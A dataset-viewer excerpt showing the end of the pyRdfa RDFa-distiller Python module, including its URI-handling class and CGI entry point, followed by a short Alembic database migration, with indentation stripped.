"steam", "svn", "teamspeak", "things", "udb", "unreal", "ut2004",
"ventrillo", "view-source", "webcal", "wtai", "wyciwyg", "xfire", "xri", "ymsgr"
]
# These come from the IANA page
historical_iana_schemes = [
"fax", "mailserver", "modem", "pack", "prospero", "snews", "videotex", "wais"
]
provisional_iana_schemes = [
"afs", "dtn", "dvb", "icon", "ipn", "jms", "oid", "rsync", "ni"
]
other_used_schemes = [
"hdl", "isbn", "issn", "mstp", "rtmp", "rtspu", "stp"
]
uri_schemes = registered_iana_schemes + unofficial_common + historical_iana_schemes + provisional_iana_schemes + other_used_schemes
# List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
builtInTransformers = [
empty_safe_curie, top_about, vocab_for_role
]
#########################################################################################################
class pyRdfa :
"""Main processing class for the distiller
@ivar options: an instance of the L{Options} class
@ivar media_type: the preferred default media type, possibly set at initialization
@ivar base: the base value, possibly set at initialization
@ivar http_status: HTTP Status, to be returned when the package is used via a CGI entry. Initially set to 200, may be modified by exception handlers
"""
def __init__(self, options = None, base = "", media_type = "", rdfa_version = None) :
"""
@keyword options: Options for the distiller
@type options: L{Options}
@keyword base: URI for the default "base" value (usually the URI of the file to be processed)
@keyword media_type: explicit setting of the preferred media type (a.k.a. content type) of the the RDFa source
@keyword rdfa_version: the RDFa version that should be used. If not set, the value of the global L{rdfa_current_version} variable is used
"""
self.http_status = 200
self.base = base
if base == "" :
self.required_base = None
else :
self.required_base = base
self.charset = None
# predefined content type
self.media_type = media_type
if options == None :
self.options = Options()
else :
self.options = options
if media_type != "" :
self.options.set_host_language(self.media_type)
if rdfa_version is not None :
self.rdfa_version = rdfa_version
else :
self.rdfa_version = None
def _get_input(self, name) :
"""
Trying to guess whether "name" is a URI or a string (for a file); it then tries to open this source accordingly,
returning a file-like object. If name is none of these, it returns the input argument (that should
be, supposedly, a file-like object already).
If the media type has not been set explicitly at initialization of this instance,
the method also sets the media_type based on the HTTP GET response or the suffix of the file. See
L{host.preferred_suffixes} for the suffix to media type mapping.
@param name: identifier of the input source
@type name: string or a file-like object
@return: a file like object if opening "name" is possible and successful, "name" otherwise
"""
try :
# Python 2 branch
isstring = isinstance(name, basestring)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
if isstring :
# check if this is a URI, ie, if there is a valid 'scheme' part
# otherwise it is considered to be a simple file
if urlparse(name)[0] != "" :
url_request = URIOpener(name)
self.base = url_request.location
if self.media_type == "" :
if url_request.content_type in content_to_host_language :
self.media_type = url_request.content_type
else :
self.media_type = MediaTypes.xml
self.options.set_host_language(self.media_type)
self.charset = url_request.charset
if self.required_base == None :
self.required_base = name
return url_request.data
else :
# Creating a File URI for this thing
if self.required_base == None :
self.required_base = "file://" + os.path.join(os.getcwd(),name)
if self.media_type == "" :
self.media_type = MediaTypes.xml
# see if the default should be overwritten
for suffix in preferred_suffixes :
if name.endswith(suffix) :
self.media_type = preferred_suffixes[suffix]
self.charset = 'utf-8'
break
self.options.set_host_language(self.media_type)
return open(name, 'rb')
else :
return name
except HTTPError :
raise sys.exc_info()[1]
except :
(type, value, traceback) = sys.exc_info()
raise FailedSource(value)
####################################################################################################################
# Externally used methods
#
def graph_from_DOM(self, dom, graph = None, pgraph = None) :
"""
Extract the RDF Graph from a DOM tree. This is where the real processing happens. All other methods get down to this
one, eventually (e.g., after opening a URI and parsing it into a DOM).
@param dom: a DOM Node element, the top level entry node for the whole tree (i.e., the C{dom.documentElement} is used to initiate processing down the node hierarchy)
@keyword graph: an RDF Graph (if None, than a new one is created)
@type graph: rdflib Graph instance.
@keyword pgraph: an RDF Graph to hold (possibly) the processor graph content. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
@type pgraph: rdflib Graph instance
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyGraph(tog, fromg) :
for t in fromg :
tog.add(t)
for k,ns in fromg.namespaces() :
tog.bind(k,ns)
if graph == None :
# Create the RDF Graph, that will contain the return triples...
graph = Graph()
# this will collect the content, the 'default graph', as called in the RDFa spec
default_graph = Graph()
# get the DOM tree
topElement = dom.documentElement
# Create the initial state. This takes care of things
# like base, top level namespace settings, etc.
state = ExecutionContext(topElement, default_graph, base=self.required_base if self.required_base != None else "", options=self.options, rdfa_version=self.rdfa_version)
# Perform the built-in and external transformations on the HTML tree.
logger.info(self.options)
for trans in self.options.transformers + builtInTransformers :
trans(topElement, self.options, state)
# This may have changed if the state setting detected an explicit version information:
self.rdfa_version = state.rdfa_version
# The top level subject starts with the current document; this
# is used by the recursion
# this function is the real workhorse
parse_one_node(topElement, default_graph, None, state, [])
# Massage the output graph in term of rdfa:Pattern and rdfa:copy
handle_prototypes(default_graph)
# If the RDFS expansion has to be made, here is the place...
if self.options.vocab_expansion :
from .rdfs.process import process_rdfa_sem
process_rdfa_sem(default_graph, self.options)
# Experimental feature: nothing for now, this is kept as a placeholder
if self.options.experimental_features :
pass
# What should be returned depends on the way the options have been set up
if self.options.output_default_graph :
copyGraph(graph, default_graph)
if self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
elif self.options.output_processor_graph :
if pgraph != None :
copyGraph(pgraph, self.options.processor_graph.graph)
else :
copyGraph(graph, self.options.processor_graph.graph)
# this is necessary if several DOM trees are handled in a row...
self.options.reset_processor_graph()
return graph
def graph_from_source(self, name, graph = None, rdfOutput = False, pgraph = None) :
"""
Extract an RDF graph from an RDFa source. The source is parsed, the RDF extracted, and the RDFa Graph is
returned. This is a front-end to the L{pyRdfa.graph_from_DOM} method.
@param name: a URI, a file name, or a file-like object
@param graph: rdflib Graph instance. If None, a new one is created.
@param pgraph: rdflib Graph instance for the processor graph. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
@param rdfOutput: whether runtime exceptions should be turned into RDF and returned as part of the processor graph
@return: an RDF Graph
@rtype: rdflib Graph instance
"""
def copyErrors(tog, options) :
if tog == None :
tog = Graph()
if options.output_processor_graph :
for t in options.processor_graph.graph :
tog.add(t)
if pgraph != None : pgraph.add(t)
for k,ns in options.processor_graph.graph.namespaces() :
tog.bind(k,ns)
if pgraph != None : pgraph.bind(k,ns)
options.reset_processor_graph()
return tog
# Separating this for a forward Python 3 compatibility
try :
# Python 2 branch
isstring = isinstance(name, basestring)
except :
# Python 3 branch
isstring = isinstance(name, str)
try :
# First, open the source... Possible HTTP errors are returned as error triples
input = None
try :
input = self._get_input(name)
except FailedSource :
f = sys.exc_info()[1]
self.http_status = 400
if not rdfOutput : raise f
err = self.options.add_error(f.msg, FileReferenceError, name)
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
except HTTPError :
h = sys.exc_info()[1]
self.http_status = h.http_code
if not rdfOutput : raise h
err = self.options.add_error("HTTP Error: %s (%s)" % (h.http_code,h.msg), HTError, name)
self.options.processor_graph.add_http_context(err, h.http_code)
return copyErrors(graph, self.options)
except Exception :
e = sys.exc_info()[1]
self.http_status = 500
# Something nasty happened:-(
if not rdfOutput : raise e
err = self.options.add_error(str(e), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
dom = None
try :
msg = ""
parser = None
if self.options.host_language == HostLanguage.html5 :
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import html5lib
parser = html5lib.HTMLParser(tree=html5lib.treebuilders.getTreeBuilder("dom"))
if self.charset :
# This means the HTTP header has provided a charset, or the
# file is a local file when we suppose it to be a utf-8
dom = parser.parse(input, encoding=self.charset)
else :
# No charset set. The HTMLLib parser tries to sniff into the
# the file to find a meta header for the charset; if that
# works, fine, otherwise it falls back on window-...
dom = parser.parse(input)
try :
if isstring :
input.close()
input = self._get_input(name)
else :
input.seek(0)
from .host import adjust_html_version
self.rdfa_version = adjust_html_version(input, self.rdfa_version)
except :
# if anyting goes wrong, it is not really important; rdfa version stays what it was...
pass
else :
# in other cases an XML parser has to be used
from .host import adjust_xhtml_and_version
parse = xml.dom.minidom.parse
dom = parse(input)
(adjusted_host_language, version) = adjust_xhtml_and_version(dom, self.options.host_language, self.rdfa_version)
self.options.host_language = adjusted_host_language
self.rdfa_version = version
except ImportError :
msg = "HTML5 parser not available. Try installing html5lib <http://code.google.com/p/html5lib>"
raise ImportError(msg)
except Exception :
e = sys.exc_info()[1]
# These are various parsing exception. Per spec, this is a case when
# error triples MUST be returned, ie, the usage of rdfOutput (which switches between an HTML formatted
# return page or a graph with error triples) does not apply
err = self.options.add_error(str(e), context = name)
self.http_status = 400
self.options.processor_graph.add_http_context(err, 400)
return copyErrors(graph, self.options)
# If we got here, we have a DOM tree to operate on...
return self.graph_from_DOM(dom, graph, pgraph)
except Exception :
# Something nasty happened during the generation of the graph...
(a,b,c) = sys.exc_info()
sys.excepthook(a,b,c)
if isinstance(b, ImportError) :
self.http_status = None
else :
self.http_status = 500
if not rdfOutput : raise b
err = self.options.add_error(str(b), context = name)
self.options.processor_graph.add_http_context(err, 500)
return copyErrors(graph, self.options)
def rdf_from_sources(self, names, outputFormat = "turtle", rdfOutput = False) :
"""
Extract and RDF graph from a list of RDFa sources and serialize them in one graph. The sources are parsed, the RDF
extracted, and serialization is done in the specified format.
@param names: list of sources, each can be a URI, a file name, or a file-like object
@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
# This is better because it gives access to the various, non-standard serializations
# If it does not work because the extra are not installed, fall back to the standard
# rdlib distribution...
try :
from pyRdfaExtras import MyGraph
graph = MyGraph()
except :
graph = Graph()
# graph.bind("xsd", Namespace('http://www.w3.org/2001/XMLSchema#'))
# the value of rdfOutput determines the reaction on exceptions...
for name in names :
self.graph_from_source(name, graph, rdfOutput)
retval = graph.serialize(format=outputFormat)
return retval
def rdf_from_source(self, name, outputFormat = "turtle", rdfOutput = False) :
"""
Extract and RDF graph from an RDFa source and serialize it in one graph. The source is parsed, the RDF
extracted, and serialization is done in the specified format.
@param name: a URI, a file name, or a file-like object
@keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
@keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
@type rdfOutput: boolean
@return: a serialized RDF Graph
@rtype: string
"""
return self.rdf_from_sources([name], outputFormat, rdfOutput)
################################################# CGI Entry point
def processURI(uri, outputFormat, form={}) :
"""The standard processing of an RDFa uri options in a form; used as an entry point from a CGI call.
The call accepts extra form options (i.e., HTTP GET options) as follows:
- C{graph=[output|processor|output,processor|processor,output]} specifying which graphs are returned. Default: C{output}
- C{space_preserve=[true|false]} means that plain literals are normalized in terms of white spaces. Default: C{false}
- C{rfa_version} provides the RDFa version that should be used for distilling. The string should be of the form "1.0" or "1.1". Default is the highest version the current package implements, currently "1.1"
- C{host_language=[xhtml,html,xml]} : the host language. Used when files are uploaded or text is added verbatim, otherwise the HTTP return header should be used. Default C{xml}
- C{embedded_rdf=[true|false]} : whether embedded turtle or RDF/XML content should be added to the output graph. Default: C{false}
- C{vocab_expansion=[true|false]} : whether the vocabularies should be expanded through the restricted RDFS entailment. Default: C{false}
- C{vocab_cache=[true|false]} : whether vocab caching should be performed or whether it should be ignored and vocabulary files should be picked up every time. Default: C{false}
- C{vocab_cache_report=[true|false]} : whether vocab caching details should be reported. Default: C{false}
- C{vocab_cache_bypass=[true|false]} : whether vocab caches have to be regenerated every time. Default: C{false}
- C{rdfa_lite=[true|false]} : whether warnings should be generated for non RDFa Lite attribute usage. Default: C{false}
@param uri: URI to access. Note that the C{text:} and C{uploaded:} fake URI values are treated separately; the former is for textual intput (in which case a StringIO is used to get the data) and the latter is for uploaded file, where the form gives access to the file directly.
@param outputFormat: serialization format, as defined by the package. Currently "xml", "turtle", "nt", or "json". Default is "turtle", also used if any other string is given.
@param form: extra call options (from the CGI call) to set up the local options
@type form: cgi FieldStorage instance
@return: serialized graph
@rtype: string
"""
def _get_option(param, compare_value, default) :
param_old = param.replace('_','-')
if param in list(form.keys()) :
val = form.getfirst(param).lower()
return val == compare_value
elif param_old in list(form.keys()) :
# this is to ensure the old style parameters are still valid...
# in the old days I used '-' in the parameters, the standard favours '_'
val = form.getfirst(param_old).lower()
return val == compare_value
else :
return default
if uri == "uploaded:" :
input = form["uploaded"].file
base = ""
elif uri == "text:" :
input = StringIO(form.getfirst("text"))
base = ""
else :
input = uri
base = uri
if "rdfa_version" in list(form.keys()) :
rdfa_version = form.getfirst("rdfa_version")
else :
rdfa_version = None
# working through the possible options
# Host language: HTML, XHTML, or XML
# Note that these options should be used for the upload and inline version only in case of a form
# for real uris the returned content type should be used
if "host_language" in list(form.keys()) :
if form.getfirst("host_language").lower() == "xhtml" :
media_type = MediaTypes.xhtml
elif form.getfirst("host_language").lower() == "html" :
media_type = MediaTypes.html
elif form.getfirst("host_language").lower() == "svg" :
media_type = MediaTypes.svg
elif form.getfirst("host_language").lower() == "atom" :
media_type = MediaTypes.atom
else :
media_type = MediaTypes.xml
else :
media_type = ""
transformers = []
check_lite = "rdfa_lite" in list(form.keys()) and form.getfirst("rdfa_lite").lower() == "true"
# The code below is left for backward compatibility only. In fact, these options are not exposed any more,
# they are not really in use
if "extras" in list(form.keys()) and form.getfirst("extras").lower() == "true" :
from .transform.metaname import meta_transform
from .transform.OpenID import OpenID_transform
from .transform.DublinCore import DC_transform
for t in [OpenID_transform, DC_transform, meta_transform] :
transformers.append(t)
else :
if "extra-meta" in list(form.keys()) and form.getfirst("extra-meta").lower() == "true" :
from .transform.metaname import meta_transform
transformers.append(meta_transform)
if "extra-openid" in list(form.keys()) and form.getfirst("extra-openid").lower() == "true" :
from .transform.OpenID import OpenID_transform
transformers.append(OpenID_transform)
if "extra-dc" in list(form.keys()) and form.getfirst("extra-dc").lower() == "true" :
from .transform.DublinCore import DC_transform
transformers.append(DC_transform)
output_default_graph = True
output_processor_graph = False
# Note that I use the 'graph' and the 'rdfagraph' form keys here. Reason is that
# I used 'graph' in the previous versions, including the RDFa 1.0 processor,
# so if I removed that altogether that would create backward incompatibilities
# On the other hand, the RDFa 1.1 doc clearly refers to 'rdfagraph' as the standard
# key.
a = None
if "graph" in list(form.keys()) :
a = form.getfirst("graph").lower()
elif "rdfagraph" in list(form.keys()) :
a = form.getfirst("rdfagraph").lower()
if a != None :
if a == "processor" :
output_default_graph = False
output_processor_graph = True
elif a == "processor,output" or a == "output,processor" :
output_processor_graph = True
embedded_rdf = _get_option( "embedded_rdf", "true", False)
space_preserve = _get_option( "space_preserve", "true", True)
vocab_cache = _get_option( "vocab_cache", "true", True)
vocab_cache_report = _get_option( "vocab_cache_report", "true", False)
refresh_vocab_cache = _get_option( "vocab_cache_refresh", "true", False)
vocab_expansion = _get_option( "vocab_expansion", "true", False)
if vocab_cache_report : output_processor_graph = True
options = Options(output_default_graph = output_default_graph,
output_processor_graph = output_processor_graph,
space_preserve = space_preserve,
transformers = transformers,
vocab_cache = vocab_cache,
vocab_cache_report = vocab_cache_report,
refresh_vocab_cache = refresh_vocab_cache,
vocab_expansion = vocab_expansion,
embedded_rdf = embedded_rdf,
check_lite = check_lite
)
processor = pyRdfa(options = options, base = base, media_type = media_type, rdfa_version = rdfa_version)
# Decide the output format; the issue is what should happen in case of a top level error like an inaccessibility of
# the html source: should a graph be returned or an HTML page with an error message?
# decide whether HTML or RDF should be sent.
htmlOutput = False
#if 'HTTP_ACCEPT' in os.environ :
# acc = os.environ['HTTP_ACCEPT']
# possibilities = ['text/html',
# 'application/rdf+xml',
# 'text/turtle; charset=utf-8',
# 'application/json',
# 'application/ld+json',
# 'text/rdf+n3']
#
# # this nice module does content negotiation and returns the preferred format
# sg = acceptable_content_type(acc, possibilities)
# htmlOutput = (sg != None and sg[0] == content_type('text/html'))
# os.environ['rdfaerror'] = 'true'
# This is really for testing purposes only, it is an unpublished flag to force RDF output no
# matter what
try :
graph = processor.rdf_from_source(input, outputFormat, rdfOutput = ("forceRDFOutput" in list(form.keys())) or not htmlOutput)
if outputFormat == "n3" :
retval = 'Content-Type: text/rdf+n3; charset=utf-8\n'
elif outputFormat == "nt" or outputFormat == "turtle" :
retval = 'Content-Type: text/turtle; charset=utf-8\n'
elif outputFormat == "json-ld" or outputFormat == "json" :
retval = 'Content-Type: application/ld+json; charset=utf-8\n'
else :
retval = 'Content-Type: application/rdf+xml; charset=utf-8\n'
retval += '\n'
retval += graph
return retval
except HTTPError :
(type,h,traceback) = sys.exc_info()
import cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s \n\n' % h.http_code
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>HTTP Error in distilling RDFa content</title>\n"
retval += "</head><body>\n"
retval += "<h1>HTTP Error in distilling RDFa content</h1>\n"
retval += "<p>HTTP Error: %s (%s)</p>\n" % (h.http_code,h.msg)
retval += "<p>On URI: <code>'%s'</code></p>\n" % cgi.escape(uri)
retval +="</body>\n"
retval +="</html>\n"
return retval
except :
# This branch should occur only if an exception is really raised, ie, if it is not turned
# into a graph value.
(type,value,traceback) = sys.exc_info()
import traceback, cgi
retval = 'Content-type: text/html; charset=utf-8\nStatus: %s\n\n' % processor.http_status
retval += "<html>\n"
retval += "<head>\n"
retval += "<title>Exception in RDFa processing</title>\n"
retval += "</head><body>\n"
retval += "<h1>Exception in distilling RDFa</h1>\n"
retval += "<pre>\n"
strio = StringIO()
traceback.print_exc(file=strio)
retval += strio.getvalue()
retval +="</pre>\n"
retval +="<pre>%s</pre>\n" % value
retval +="<h1>Distiller request details</h1>\n"
retval +="<dl>\n"
if uri == "text:" and "text" in form and form["text"].value != None and len(form["text"].value.strip()) != 0 :
retval +="<dt>Text input:</dt><dd>%s</dd>\n" % cgi.escape(form["text"].value).replace('\n','<br/>')
elif uri == "uploaded:" :
retval +="<dt>Uploaded file</dt>\n"
else :
retval +="<dt>URI received:</dt><dd><code>'%s'</code></dd>\n" % cgi.escape(uri)
if "host_language" in list(form.keys()) :
retval +="<dt>Media Type:</dt><dd>%s</dd>\n" % media_type
if "graph" in list(form.keys()) :
retval +="<dt>Requested graphs:</dt><dd>%s</dd>\n" % form.getfirst("graph").lower()
else :
retval +="<dt>Requested graphs:</dt><dd>default</dd>\n"
retval +="<dt>Output serialization format:</dt><dd> %s</dd>\n" % outputFormat
if "space_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\n" % form["space_preserve"].value
retval +="</dl>\n"
retval +="</body>\n"
retval +="</html>\n"
return retval
|
the-stack_0_26019
|
"""empty message
Revision ID: 6597fae10131
Revises: 65048de1ebec
Create Date: 2018-09-16 00:46:14.107664
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6597fae10131'
down_revision = '65048de1ebec'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('charge_teacher', sa.Column('tmp_classes_id', sa.String(length=80), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('charge_teacher', 'tmp_classes_id')
# ### end Alembic commands ###
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.